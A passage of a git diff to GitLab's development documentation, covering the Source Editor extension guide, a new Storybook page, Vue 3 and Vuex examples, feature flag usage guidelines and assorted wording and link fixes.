page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Source Editor **(FREE)** + +**Source Editor** provides the editing experience at GitLab. This thin wrapper around +[the Monaco editor](https://microsoft.github.io/monaco-editor/) provides necessary +helpers and abstractions, and extends Monaco [using extensions](#extensions). Multiple +GitLab features use it, including: + +- [Web IDE](../../user/project/web_ide/index.md) +- [CI Linter](../../ci/lint.md) +- [Snippets](../../user/snippets.md) +- [Web Editor](../../user/project/repository/web_editor.md) +- [Security Policies](../../user/application_security/threat_monitoring/index.md) + +## How to use Source Editor + +Source Editor is framework-agnostic and can be used in any application, including both +Rails and Vue. To help with integration, we have the dedicated `<source-editor>` +Vue component, but the integration of Source Editor is generally straightforward: + +1. Import Source Editor: + + ```javascript + import SourceEditor from '~/editor/source_editor'; + ``` + +1. Initialize global editor for the view: + + ```javascript + const editor = new SourceEditor({ + // Editor Options. + // The list of all accepted options can be found at + // https://microsoft.github.io/monaco-editor/api/enums/monaco.editor.editoroption.html + }); + ``` + +1. Create an editor's instance: + + ```javascript + editor.createInstance({ + // Source Editor configuration options. + }) + ``` + +An instance of Source Editor accepts the following configuration options: + +| Option | Required? | Description | +| -------------- | ------- | ---- | +| `el` | `true` | `HTML Node`: The element on which to render the editor. | +| `blobPath` | `false` | `String`: The name of a file to render in the editor, used to identify the correct syntax highlighter to use with that file, or another file type. Can accept wildcards like `*.js` when the actual filename isn't known or doesn't play any role. | +| `blobContent` | `false` | `String`: The initial content to render in the editor. | +| `extensions` | `false` | `Array`: Extensions to use in this instance. | +| `blobGlobalId` | `false` | `String`: An auto-generated property.<br>**Note:** This property may go away in the future. Do not pass `blobGlobalId` unless you know what you're doing.| +| Editor Options | `false` | `Object(s)`: Any property outside of the list above is treated as an Editor Option for this particular instance. Use this field to override global Editor Options on the instance level. A full [index of Editor Options](https://microsoft.github.io/monaco-editor/api/enums/monaco.editor.editoroption.html) is available. | + +## API + +The editor uses the same public API as +[provided by Monaco editor](https://microsoft.github.io/monaco-editor/api/interfaces/monaco.editor.istandalonecodeeditor.html) +with additional functions on the instance level: + +| Function | Arguments | Description +| --------------------- | ----- | ----- | +| `updateModelLanguage` | `path`: String | Updates the instance's syntax highlighting to follow the extension of the passed `path`. Available only on the instance level.| +| `use` | Array of objects | Array of extensions to apply to the instance. Accepts only the array of _objects_. You must fetch the extensions' ES6 modules must be fetched and resolved in your views or components before they are passed to `use`. This property is available on _instance_ (applies extension to this particular instance) and _global editor_ (applies the same extension to all instances) levels. | +| Monaco Editor options | See [documentation](https://microsoft.github.io/monaco-editor/api/interfaces/monaco.editor.istandalonecodeeditor.html) | Default Monaco editor options | + +## Tips + +1. Editor's loading state. + + The loading state is built in to Source Editor, making spinners and loaders + rarely needed in HTML. To benefit the built-in loading state, set the `data-editor-loading` + property on the HTML element that should contain the editor. When bootstrapping, + Source Editor shows the loader automatically. + +  + +1. Update syntax highlighting if the filename changes. + + ```javascript + // fileNameEl here is the HTML input element that contains the file name + fileNameEl.addEventListener('change', () => { + this.editor.updateModelLanguage(fileNameEl.value); + }); + ``` + +1. Get the editor's content. + + We may set up listeners on the editor for every change, but it rapidly can become + an expensive operation. Instead, get the editor's content when it's needed. + For example, on a form's submission: + + ```javascript + form.addEventListener('submit', () => { + my_content_variable = this.editor.getValue(); + }); + ``` + +1. Performance + + Even though Source Editor itself is extremely slim, it still depends on Monaco editor, + which adds weight. Every time you add Source Editor to a view, the JavaScript bundle's + size significantly increases, affecting your view's loading performance. We recommend + you import the editor on demand if either: + + - You're uncertain if the view needs the editor. + - The editor is a secondary element of the view. + + Loading Source Editor on demand is handled like loading any other module: + + ```javascript + someActionFunction() { + import(/* webpackChunkName: 'SourceEditor' */ '~/editor/source_editor'). + then(({ default: SourceEditor }) => { + const editor = new SourceEditor(); + ... + }); + ... + } + ``` + +## Extensions + +Source Editor provides a universal, extensible editing tool to the whole product, +and doesn't depend on any particular group. Even though the Source Editor's core is owned by +[Create::Editor FE Team](https://about.gitlab.com/handbook/engineering/development/dev/create-editor/), +any group can own the extensions—the main functional elements. The goal of +Source Editor extensions is to keep the editor's core slim and stable. Any +needed features can be added as extensions to this core. Any group can +build and own new editing features without worrying about changes to Source Editor +breaking or overriding them. + +You can depend on other modules in your extensions. This organization helps keep +the size of Source Editor's core at bay by importing dependencies only when needed. + +Structurally, the complete implementation of Source Editor can be presented as this diagram: + +```mermaid +graph TD; + B[Extension 1]---A[Source Editor] + C[Extension 2]---A[Source Editor] + D[Extension 3]---A[Source Editor] + E[...]---A[Source Editor] + F[Extension N]---A[Source Editor] + A[Source Editor]---Z[Monaco] +``` + +An extension is an ES6 module that exports a JavaScript object: + +```javascript +import { Position } from 'monaco-editor'; + +export default { + navigateFileStart() { + this.setPosition(new Position(1, 1)); + }, +}; + +``` + +In the extension's functions, `this` refers to the current Source Editor instance. +Using `this`, you get access to the complete instance's API, such as the +`setPosition()` method in this particular case. + +### Using an existing extension + +Adding an extension to Source Editor's instance requires the following steps: + +```javascript +import SourceEditor from '~/editor/source_editor'; +import MyExtension from '~/my_extension'; + +const editor = new SourceEditor().createInstance({ + ... +}); +editor.use(MyExtension); +``` + +### Creating an extension + +Let's create our first Source Editor extension. Extensions are +[ES6 modules](https://hacks.mozilla.org/2015/08/es6-in-depth-modules/) exporting a +basic `Object`, used to extend Source Editor's features. As a test, let's +create an extension that extends Source Editor with a new function that, when called, +outputs the editor's content in `alert`. + +`~/my_folder/my_fancy_extension.js:` + +```javascript +export default { + throwContentAtMe() { + alert(this.getValue()); + }, +}; +``` + +In the code example, `this` refers to the instance. By referring to the instance, +we can access the complete underlying +[Monaco editor API](https://microsoft.github.io/monaco-editor/api/interfaces/monaco.editor.istandalonecodeeditor.html), +which includes functions like `getValue()`. + +Now let's use our extension: + +`~/my_folder/component_bundle.js`: + +```javascript +import SourceEditor from '~/editor/source_editor'; +import MyFancyExtension from './my_fancy_extension'; + +const editor = new SourceEditor().createInstance({ + ... +}); +editor.use(MyFancyExtension); +... +someButton.addEventListener('click', () => { + editor.throwContentAtMe(); +}); +``` + +First of all, we import Source Editor and our new extension. Then we create the +editor and its instance. By default Source Editor has no `throwContentAtMe` method. +But the `editor.use(MyFancyExtension)` line brings that method to our instance. +After that, we can use it any time we need it. In this case, we call it when some +theoretical button has been clicked. + +This script would result in an alert containing the editor's content when `someButton` is clicked. + + + +### Tips + +1. Performance + + Just like Source Editor itself, any extension can be loaded on demand to not harm + loading performance of the views: + + ```javascript + const EditorPromise = import( + /* webpackChunkName: 'SourceEditor' */ '~/editor/source_editor' + ); + const MarkdownExtensionPromise = import('~/editor/source_editor_markdown_ext'); + + Promise.all([EditorPromise, MarkdownExtensionPromise]) + .then(([{ default: SourceEditor }, { default: MarkdownExtension }]) => { + const editor = new SourceEditor().createInstance({ + ... + }); + editor.use(MarkdownExtension); + }); + ``` + +1. Using multiple extensions + + Just pass the array of extensions to your `use` method: + + ```javascript + editor.use([FileTemplateExtension, MyFancyExtension]); + ``` diff --git a/doc/development/fe_guide/storybook.md b/doc/development/fe_guide/storybook.md new file mode 100644 index 00000000000..15225cc1deb --- /dev/null +++ b/doc/development/fe_guide/storybook.md @@ -0,0 +1,51 @@ +--- +stage: none +group: unassigned +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Storybook + +The Storybook for the `gitlab-org/gitlab` project is available on our [GitLab Pages site](https://gitlab-org.gitlab.io/gitlab/storybook). + +## Storybook in local development + +Storybook dependencies and configuration are located under the `storybook/` directory. + +To build and launch Storybook locally, in the root directory of the `gitlab` project: + +1. Install Storybook dependencies: + + ```shell + yarn storybook:install + ``` + +1. Build the Storybook site: + + ```shell + yarn storybook:start + ``` + +## Adding components to Storybook + +Stories can be added for any Vue component in the `gitlab` repository. + +To add a story: + +1. Create a new `.stories.js` file in the same directory as the Vue component. + The file name should have the same prefix as the Vue component. + + ```txt + vue_shared/ + ├─ components/ + │ ├─ sidebar + │ │ ├─ todo_button.vue + │ │ ├─ todo_button.stories.js + ``` + +1. Write the story as per the [official Storybook instructions](https://storybook.js.org/docs/vue/writing-stories/introduction/) + + Notes: + - Specify the `title` field of the story as the component's file path from the `javascripts/` directory, + e.g. if the component is located at `app/assets/javascripts/vue_shared/components/sidebar/todo_toggle/todo_button.vue`, specify the `title` as + `vue_shared/components/To-do Button`. This will ensure the Storybook navigation maps closely to our internal directory structure. diff --git a/doc/development/fe_guide/style/html.md b/doc/development/fe_guide/style/html.md index 18f72a9655c..72492d56ee4 100644 --- a/doc/development/fe_guide/style/html.md +++ b/doc/development/fe_guide/style/html.md @@ -62,7 +62,7 @@ Avoid forcing links to open in a new window as this reduces the control the user However, it might be a good idea to use a blank target when replacing the current page with the link makes the user lose content or progress. -Use `rel="noopener noreferrer"` whenever your links open in a new window, i.e. `target="_blank"`. This prevents a security vulnerability [documented by JitBit](https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/). +Use `rel="noopener noreferrer"` whenever your links open in a new window, that is, `target="_blank"`. This prevents a security vulnerability [documented by JitBit](https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/). When using `gl-link`, using `target="_blank"` is sufficient as it automatically adds `rel="noopener noreferrer"` to the link. diff --git a/doc/development/fe_guide/style/scss.md b/doc/development/fe_guide/style/scss.md index c0817626360..4a9446f2949 100644 --- a/doc/development/fe_guide/style/scss.md +++ b/doc/development/fe_guide/style/scss.md @@ -51,7 +51,7 @@ We recommend a "utility-first" approach. 1. Start with utility classes. 1. If composing utility classes into a component class removes code duplication and encapsulates a clear responsibility, do it. -This encourages an organic growth of component classes and prevents the creation of one-off non-reusable classes. Also, the kind of classes that emerge from "utility-first" tend to be design-centered (e.g. `.button`, `.alert`, `.card`) rather than domain-centered (e.g. `.security-report-widget`, `.commit-header-icon`). +This encourages an organic growth of component classes and prevents the creation of one-off non-reusable classes. Also, the kind of classes that emerge from "utility-first" tend to be design-centered (for example, `.button`, `.alert`, `.card`) rather than domain-centered (for example, `.security-report-widget`, `.commit-header-icon`). Inspiration: @@ -139,7 +139,7 @@ To check if any warnings are produced by your changes, run `yarn lint:stylelint` catch any warnings. If the Rake task is throwing warnings you don't understand, SCSS Lint's -documentation includes [a full list of their rules](https://stylelint.io/user-guide/rules/list). +documentation includes [a full list of their rules](https://stylelint.io/user-guide/rules/list/). ### Fixing issues diff --git a/doc/development/fe_guide/vue3_migration.md b/doc/development/fe_guide/vue3_migration.md index d06e93da0f3..7da462a5f89 100644 --- a/doc/development/fe_guide/vue3_migration.md +++ b/doc/development/fe_guide/vue3_migration.md @@ -8,7 +8,10 @@ info: To determine the technical writer assigned to the Stage/Group associated w Preparations for a Vue 3 migration are tracked in epic [&3174](https://gitlab.com/groups/gitlab-org/-/epics/3174) -In order to prepare for the eventual migration to Vue 3.x, we should be wary about adding the following features to the codebase: +In order to prepare for the eventual migration to Vue 3.x, we should not use the following deprecated features in the codebase: + +NOTE: +Our linting rules block the use of these deprecated features. ## Vue filters @@ -132,3 +135,47 @@ shallowMount(MyAwesomeComponent, { } }) ``` + +## Props default function `this` access + +**Why?** + +In Vue 3, props default value factory functions no longer have access to `this` +(the component instance). + +**What to use instead** + +Write a computed prop that resolves the desired value from other props. This +will work in both Vue 2 and 3. + +```html +<script> +export default { + props: { + metric: { + type: String, + required: true, + }, + title: { + type: String, + required: false, + default: null, + }, + }, + computed: { + actualTitle() { + return this.title ?? this.metric; + }, + }, +} + +</script> + +<template> + <div>{{ actualTitle }}</div> +</template> +``` + +[In Vue 3](https://v3.vuejs.org/guide/migration/props-default-this.html#props-default-function-this-access), +the props default value factory is passed the raw props as an argument, and can +also access injections. diff --git a/doc/development/fe_guide/vuex.md b/doc/development/fe_guide/vuex.md index 3d0044928f1..064f01c8195 100644 --- a/doc/development/fe_guide/vuex.md +++ b/doc/development/fe_guide/vuex.md @@ -106,7 +106,7 @@ In this file, we write the actions that call mutations for handling a list of us .then(({ data }) => commit(types.RECEIVE_USERS_SUCCESS, data)) .catch((error) => { commit(types.RECEIVE_USERS_ERROR, error) - createFlash('There was an error') + createFlash({ message: 'There was an error' }) }); } @@ -540,11 +540,11 @@ export default { foo: '' }, actions: { - updateBar() {...} - updateAll() {...} + updateBar() {...}, + updateAll() {...}, }, getters: { - getFoo() {...} + getFoo() {...}, } } ``` @@ -559,13 +559,13 @@ export default { * @param {string} list[].getter - the name of the getter, leave it empty to not use a getter * @param {string} list[].updateFn - the name of the action, leave it empty to use the default action * @param {string} defaultUpdateFn - the default function to dispatch - * @param {string} root - optional key of the state where to search fo they keys described in list + * @param {string|function} root - optional key of the state where to search for they keys described in list * @returns {Object} a dictionary with all the computed properties generated */ ...mapComputed( [ 'baz', - { key: 'bar', updateFn: 'updateBar' } + { key: 'bar', updateFn: 'updateBar' }, { key: 'foo', getter: 'getFoo' }, ], 'updateAll', @@ -575,3 +575,48 @@ export default { ``` `mapComputed` then generates the appropriate computed properties that get the data from the store and dispatch the correct action when updated. + +In the event that the `root` of the key is more than one-level deep you can use a function to retrieve the relevant state object. + +For instance, with a store like: + +```javascript +// this store is non-functional and only used to give context to the example +export default { + state: { + foo: { + qux: { + baz: '', + bar: '', + foo: '', + }, + }, + }, + actions: { + updateBar() {...}, + updateAll() {...}, + }, + getters: { + getFoo() {...}, + } +} +``` + +The `root` could be: + +```javascript +import { mapComputed } from '~/vuex_shared/bindings' +export default { + computed: { + ...mapComputed( + [ + 'baz', + { key: 'bar', updateFn: 'updateBar' }, + { key: 'foo', getter: 'getFoo' }, + ], + 'updateAll', + (state) => state.foo.qux, + ), + } +} +``` diff --git a/doc/development/feature_flags/controls.md b/doc/development/feature_flags/controls.md index a9ebcfc9fba..c69a698149e 100644 --- a/doc/development/feature_flags/controls.md +++ b/doc/development/feature_flags/controls.md @@ -221,7 +221,7 @@ you should fully roll out the feature by enabling the flag **globally** by runni ``` This changes the feature flag state to be **enabled** always, which overrides the -existing gates (e.g. `--group=gitlab-org`) in the above processes. +existing gates (for example, `--group=gitlab-org`) in the above processes. Note, that if an actor based feature gate is present, switching the `default_enabled` attribute of the YAML definition from `false` to `true` @@ -265,6 +265,8 @@ To disable a feature flag that has been enabled for a specific project you can r You cannot selectively disable feature flags for a specific project/group/user without applying a [specific method of implementing](index.md#selectively-disable-by-actor) the feature flags. +If a feature flag is disabled via chatops, that will take precedence over the `default_enabled` value in the YML. In other words, you could have a feature enabled for on-premise installations but not for GitLab.com. + ### Feature flag change logging #### ChatOps level diff --git a/doc/development/feature_flags/development.md b/doc/development/feature_flags/development.md deleted file mode 100644 index d7807c6f586..00000000000 --- a/doc/development/feature_flags/development.md +++ /dev/null @@ -1,9 +0,0 @@ ---- -redirect_to: 'index.md' -remove_date: '2021-06-01' ---- - -This document was moved to [another location](index.md). - -<!-- This redirect file can be deleted after 2021-06-01. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page -->
\ No newline at end of file diff --git a/doc/development/feature_flags/index.md b/doc/development/feature_flags/index.md index 79a100e44a5..1962d5262ce 100644 --- a/doc/development/feature_flags/index.md +++ b/doc/development/feature_flags/index.md @@ -5,15 +5,15 @@ group: Development info: "See the Technical Writers assigned to Development Guidelines: https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments-to-development-guidelines" --- -# Developing with feature flags +# Feature flags in the development of GitLab **NOTE**: The documentation below covers feature flags used by GitLab to deploy its own features, which **is not** the same as the [feature flags offered as part of the product](../../operations/feature_flags.md). This document provides guidelines on how to use feature flags -in the GitLab codebase to conditionally enable features -and test them. +for the development of GitLab to conditionally and/or incrementally enable features +and test them in production/staging. WARNING: All newly-introduced feature flags should be [disabled by default](https://about.gitlab.com/handbook/product-development-flow/feature-flag-lifecycle/#feature-flags-in-gitlab-development). @@ -21,23 +21,29 @@ All newly-introduced feature flags should be [disabled by default](https://about NOTE: This document is the subject of continued work as part of an epic to [improve internal usage of Feature Flags](https://gitlab.com/groups/gitlab-org/-/epics/3551). Raise any suggestions as new issues and attach them to the epic. +For an [overview of the feature flag lifecycle](https://about.gitlab.com/handbook/product-development-flow/feature-flag-lifecycle/#feature-flag-lifecycle), or if you need help deciding [if you should use a feature flag](https://about.gitlab.com/handbook/product-development-flow/feature-flag-lifecycle/#when-to-use-feature-flags) or not, please see the [feature flag lifecycle](https://about.gitlab.com/handbook/product-development-flow/feature-flag-lifecycle) handbook page. + +## When to use feature flags + +Moved to the ["When to use feature flags"](https://about.gitlab.com/handbook/product-development-flow/feature-flag-lifecycle/#when-to-use-feature-flags) section in the handbook. + ## Feature flags in GitLab development The following highlights should be considered when deciding if feature flags should be leveraged: -- By default, the feature flags should be **off**. +- The feature flag must be **disabled by default**. - Feature flags should remain in the codebase for as short period as possible to reduce the need for feature flag accounting. -- The person operating with feature flags is responsible for clearly communicating - the status of a feature behind the feature flag with responsible stakeholders. The +- The person operating the feature flag is responsible for clearly communicating + the status of a feature behind the feature flag in the documentation and with other stakeholders. The issue description should be updated with the feature flag name and whether it is defaulted on or off as soon it is evident that a feature flag is needed. -- Merge requests that make changes hidden behind a feature flag, or remove an +- Merge requests that introduce a feature flag, update its state, or remove them existing feature flag because a feature is deemed stable must have the ~"feature flag" label assigned. -- When development of a feature will be spread across multiple merge - requests, you can use the following workflow: + +When the feature implementation is delivered among multiple merge requests: 1. [Create a new feature flag](#create-a-new-feature-flag) which is **off** by default, in the first merge request which uses the flag. @@ -55,7 +61,7 @@ should be leveraged: One might be tempted to think that feature flags will delay the release of a feature by at least one month (= one release). This is not the case. A feature flag does not have to stick around for a specific amount of time -(e.g. at least one release), instead they should stick around until the feature +(for example, at least one release), instead they should stick around until the feature is deemed stable. Stable means it works on GitLab.com without causing any problems, such as outages. @@ -72,24 +78,51 @@ Choose a feature flag type that matches the expected usage. ### `development` type `development` feature flags are short-lived feature flags, -used so that unfinished code can be deployed in production. +used for deploying unfinished code to production. Most feature flags used at +GitLab are the `development` type. -A `development` feature flag should have a rollout issue, -ideally created using the [Feature Flag Roll Out template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/issue_templates/Feature%20Flag%20Roll%20Out.md). +A `development` feature flag must have a rollout issue +created from the [Feature Flag Roll Out template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/issue_templates/Feature%20Flag%20Roll%20Out.md). + +The format for `development` feature flags is `Feature.<state>(:<dev_flag_name>)`. +To enable and disable them, run on the GitLab Rails console: + +```ruby +# To enable it for the instance: +Feature.enable(:<dev_flag_name>) -This is the default type used when calling `Feature.enabled?`. +# To disable it for the instance: +Feature.disable(:<dev_flag_name>) + +# To enable for a specific project: +Feature.enable(:<dev_flag_name>, Project.find(<project id>)) + +# To disable for a specific project: +Feature.disable(:<dev_flag_name>, Project.find(<project id>)) +``` + +To check a `development` feature flag's state: + +```ruby +# Check if the feature flag is enabled +Feature.enabled?(:dev_flag_name) + +# Check if the feature flag is disabled +Feature.disabled?(:dev_flag_name) +``` + +For `development` feature flags, the type doesn't need to be specified (they're the default type). ### `ops` type `ops` feature flags are long-lived feature flags that control operational aspects of GitLab product behavior. For example, feature flags that disable features that might -have a performance impact, like special Sidekiq worker behavior. +have a performance impact such as Sidekiq worker behavior. `ops` feature flags likely do not have rollout issues, as it is hard to predict when they are enabled or disabled. -To use `ops` feature flags, you must append `type: :ops` to `Feature.enabled?` -invocations: +To invoke `ops` feature flags, you must append `type: :ops`: ```ruby # Check if feature flag is enabled @@ -108,7 +141,7 @@ push_frontend_feature_flag(:my_ops_flag, project, type: :ops) An `experiment` feature flag should conform to the same standards as a `development` feature flag, although the interface has some differences. An experiment feature flag should have a rollout issue, -ideally created using the [Experiment Tracking template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/issue_templates/experiment_tracking_template.md). More information can be found in the [experiment guide](../experiment_guide/index.md). +created using the [Experiment Tracking template](https://gitlab.com/gitlab-org/gitlab/-/blob/master/.gitlab/issue_templates/experiment_tracking_template.md). More information can be found in the [experiment guide](../experiment_guide/index.md). ## Feature flag definition and validation @@ -175,9 +208,24 @@ type: development default_enabled: false ``` +All newly-introduced feature flags must be [**disabled by default**](https://about.gitlab.com/handbook/product-development-flow/feature-flag-lifecycle/#feature-flags-in-gitlab-development). + +Features that are developed and merged behind a feature flag +should not include a changelog entry. The entry should be added either in the merge +request removing the feature flag or the merge request where the default value of +the feature flag is set to enabled. If the feature contains any database migrations, it +*should* include a changelog entry for the database changes. + NOTE: To create a feature flag that is only used in EE, add the `--ee` flag: `bin/feature-flag --ee` +### Risk of a broken master (main) branch + +WARNING: +Feature flags **must** be used in the MR that introduces them. Not doing so causes a +[broken master](https://about.gitlab.com/handbook/engineering/workflow/#broken-master) scenario due +to the `rspec:feature-flags` job that only runs on the `master` branch. + ## Delete a feature flag See [cleaning up feature flags](controls.md#cleaning-up) for more information about @@ -286,8 +334,11 @@ end ### Frontend -Use the `push_frontend_feature_flag` method which is available to all controllers that inherit from `ApplicationController`. You can use -this method to expose the state of a feature flag, for example: +When using a feature flag for UI elements, make sure to _also_ use a feature +flag for the underlying backend code, if there is any. This ensures there is +absolutely no way to use the feature until it is enabled. + +Use the `push_frontend_feature_flag` method which is available to all controllers that inherit from `ApplicationController`. You can use this method to expose the state of a feature flag, for example: ```ruby before_action do @@ -364,6 +415,8 @@ Feature.enabled?(:feature_flag, group) Feature.enabled?(:feature_flag, user) ``` +Please see [Feature flag controls](controls.md#process) for more details on working with feature flags. + #### Selectively disable by actor By default you cannot selectively disable a feature flag by actor. @@ -461,7 +514,7 @@ Feature.remove(:feature_flag_name) - **Exception:** database migrations **should** have a changelog entry. - Any change related to a feature flag itself (flag removal, default-on setting) **should** have a changelog entry. Use the flowchart to determine the changelog entry type. - + ```mermaid graph LR A[flag: default off] -->|'added' / 'changed'| B(flag: default on) @@ -470,7 +523,7 @@ Feature.remove(:feature_flag_name) A -->|'added' / 'changed'| C A -->|no changelog| D ``` - + - Any change behind a feature flag that is **enabled** by default **should** have a changelog entry. ## Feature flags in tests diff --git a/doc/development/feature_flags/process.md b/doc/development/feature_flags/process.md index 0e962218ab9..3fbb207a12b 100644 --- a/doc/development/feature_flags/process.md +++ b/doc/development/feature_flags/process.md @@ -1,9 +1,9 @@ --- redirect_to: 'https://about.gitlab.com/handbook/product-development-flow/feature-flag-lifecycle/' -remove_date: '2021-06-01' +remove_date: '2022-03-01' --- This document was moved to [another location](https://about.gitlab.com/handbook/product-development-flow/feature-flag-lifecycle/). -<!-- This redirect file can be deleted after 2021-06-01. --> -<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page -->
\ No newline at end of file +<!-- This redirect file can be deleted after 2022-03-01. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/features_inside_dot_gitlab.md b/doc/development/features_inside_dot_gitlab.md index 36b9064bbc4..4631ab3a471 100644 --- a/doc/development/features_inside_dot_gitlab.md +++ b/doc/development/features_inside_dot_gitlab.md @@ -13,7 +13,7 @@ When implementing new features, please refer to these existing features to avoid - [Issue Templates](../user/project/description_templates.md#create-an-issue-template): `.gitlab/issue_templates/`. - [Merge Request Templates](../user/project/description_templates.md#create-a-merge-request-template): `.gitlab/merge_request_templates/`. - [GitLab Kubernetes Agents](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/configuration_repository.md#layout): `.gitlab/agents/`. -- [CODEOWNERS](../user/project/code_owners.md#how-to-set-up-code-owners): `.gitlab/CODEOWNERS`. +- [CODEOWNERS](../user/project/code_owners.md#set-up-code-owners): `.gitlab/CODEOWNERS`. - [Route Maps](../ci/review_apps/#route-maps): `.gitlab/route-map.yml`. - [Customize Auto DevOps Helm Values](../topics/autodevops/customize.md#customize-values-for-helm-chart): `.gitlab/auto-deploy-values.yaml`. - [GitLab managed apps CI/CD](../user/clusters/applications.md#usage): `.gitlab/managed-apps/config.yaml`. diff --git a/doc/development/foreign_keys.md b/doc/development/foreign_keys.md index abe191ace5e..a9edbc68a2e 100644 --- a/doc/development/foreign_keys.md +++ b/doc/development/foreign_keys.md @@ -17,7 +17,7 @@ end Here you will need to add a foreign key on column `posts.user_id`. This ensures that data consistency is enforced on database level. Foreign keys also mean that -the database can very quickly remove associated data (e.g. when removing a +the database can very quickly remove associated data (for example, when removing a user), instead of Rails having to do this. ## Adding Foreign Keys In Migrations @@ -28,7 +28,8 @@ Guide](migration_style_guide.md) for more information. Keep in mind that you can only safely add foreign keys to existing tables after you have removed any orphaned rows. The method `add_concurrent_foreign_key` -does not take care of this so you'll need to do so manually. +does not take care of this so you'll need to do so manually. See +[adding foreign key constraint to an existing column](database/add_foreign_key_to_existing_column.md). ## Cascading Deletes diff --git a/doc/development/geo.md b/doc/development/geo.md index 8017bd21126..38245e5f4e5 100644 --- a/doc/development/geo.md +++ b/doc/development/geo.md @@ -56,7 +56,7 @@ Geo uses [streaming replication](#streaming-replication) to replicate the database from the **primary** to the **secondary** nodes. This replication gives the **secondary** nodes access to all the data saved in the database. So users can log in on the **secondary** and read all -the issues, merge requests, etc. on the **secondary** node. +the issues, merge requests, and so on, on the **secondary** node. ### Repository replication @@ -127,7 +127,7 @@ periodically to sync all uploads that aren't synced to the Geo Files are copied via HTTP(s) and initiated via the `/api/v4/geo/transfers/:type/:id` endpoint, -e.g. `/api/v4/geo/transfers/lfs/123`. +for example, `/api/v4/geo/transfers/lfs/123`. ## Authentication @@ -219,7 +219,7 @@ bundle exec rake geo:db:migrate Geo uses [Finders](https://gitlab.com/gitlab-org/gitlab/-/tree/master/app/finders), which are classes take care of the heavy lifting of looking up -projects/attachments/etc. in the tracking database and main database. +projects/attachments/ and so on, in the tracking database and main database. ## Redis @@ -228,7 +228,7 @@ node. It is used for caching, storing sessions, and other persistent data. Redis data replication between **primary** and **secondary** node is -not used, so sessions etc. aren't shared between nodes. +not used, so sessions and so on, aren't shared between nodes. ## Object Storage @@ -396,11 +396,6 @@ that need to be taken care of: - Health Check. If we can perform some pre-cheсks and make node unhealthy if something is wrong, we should do that. The `rake gitlab:geo:check` command has to be updated too. -### Geo self-service framework (alpha) - -We started developing a new [Geo self-service framework (alpha)](geo/framework.md) -which makes it a lot easier to add a new data type. - ## History of communication channel The communication channel has changed since first iteration, you can diff --git a/doc/development/git_object_deduplication.md b/doc/development/git_object_deduplication.md index 1607f3e7a12..3ac24b19fc2 100644 --- a/doc/development/git_object_deduplication.md +++ b/doc/development/git_object_deduplication.md @@ -163,7 +163,7 @@ repository and a pool. ### Pool existence -If GitLab thinks a pool repository exists (i.e. it exists according to +If GitLab thinks a pool repository exists (that is, it exists according to SQL), but it does not on the Gitaly server, then it is created on the fly by Gitaly. diff --git a/doc/development/gitaly.md b/doc/development/gitaly.md index 2e814a9c41b..0a17bfedc0f 100644 --- a/doc/development/gitaly.md +++ b/doc/development/gitaly.md @@ -213,7 +213,7 @@ GITALY_REPO_URL=https://gitlab+deploy-token-1000:token-here@gitlab.com/nick.thom To use a custom Gitaly repository in CI/CD, for instance if you want your GitLab fork to always use your own Gitaly fork, set `GITALY_REPO_URL` -as a [CI/CD variable](../ci/variables/README.md). +as a [CI/CD variable](../ci/variables/index.md). ### Use a locally modified version of Gitaly RPC client @@ -235,7 +235,7 @@ changes to embed a new SHA in the `Gemfile.lock` file. --- -[Return to Development documentation](README.md) +[Return to Development documentation](index.md) ## Wrapping RPCs in Feature Flags diff --git a/doc/development/github_importer.md b/doc/development/github_importer.md index cc289496301..a733d6881fa 100644 --- a/doc/development/github_importer.md +++ b/doc/development/github_importer.md @@ -145,7 +145,7 @@ long we're still performing work. GitHub has a rate limit of 5,000 API calls per hour. The number of requests necessary to import a project is largely dominated by the number of unique users -involved in a project (e.g. issue authors). Other data such as issue pages +involved in a project (for example, issue authors). Other data such as issue pages and comments typically only requires a few dozen requests to import. This is because we need the Email address of users in order to map them to GitLab users. @@ -213,3 +213,41 @@ The code for this resides in: - `lib/gitlab/github_import/label_finder.rb` - `lib/gitlab/github_import/milestone_finder.rb` - `lib/gitlab/github_import/caching.rb` + +## Logs + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/48512/diffs) in GitLab 13.7. +> - Number of imported objects [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/64256) in GitLab 14.1. + +The import progress can be checked in the `logs/importer.log` file. Each relevant import is logged +with `"import_source": "github"` and the `"project_id"`. + +The last log entry reports the number of objects fetched and imported: + +```json +{ + "message": "GitHub project import finished", + "duration_s": 347.25, + "objects_imported": { + "fetched": { + "diff_note": 93, + "issue": 321, + "note": 794, + "pull_request": 108, + "pull_request_merged_by": 92, + "pull_request_review": 81 + }, + "imported": { + "diff_note": 93, + "issue": 321, + "note": 794, + "pull_request": 108, + "pull_request_merged_by": 92, + "pull_request_review": 81 + } + }, + "import_source": "github", + "project_id": 47, + "import_stage": "Gitlab::GithubImport::Stage::FinishImportWorker" +} +``` diff --git a/doc/development/go_guide/index.md b/doc/development/go_guide/index.md index ad24353fde8..224d8a0a0f5 100644 --- a/doc/development/go_guide/index.md +++ b/doc/development/go_guide/index.md @@ -14,7 +14,7 @@ projects using the [Go language](https://golang.org). GitLab is built on top of [Ruby on Rails](https://rubyonrails.org/), but we're also using Go for projects where it makes sense. Go is a very powerful language, with many advantages, and is best suited for projects with a lot of -IO (disk/network access), HTTP requests, parallel processing, etc. Since we +IO (disk/network access), HTTP requests, parallel processing, and so on. Since we have both Ruby on Rails and Go at GitLab, we should evaluate carefully which of the two is best for the job. @@ -390,7 +390,7 @@ consistent across Workhorse, Gitaly, and, in future, other Go servers. For example, in the case of 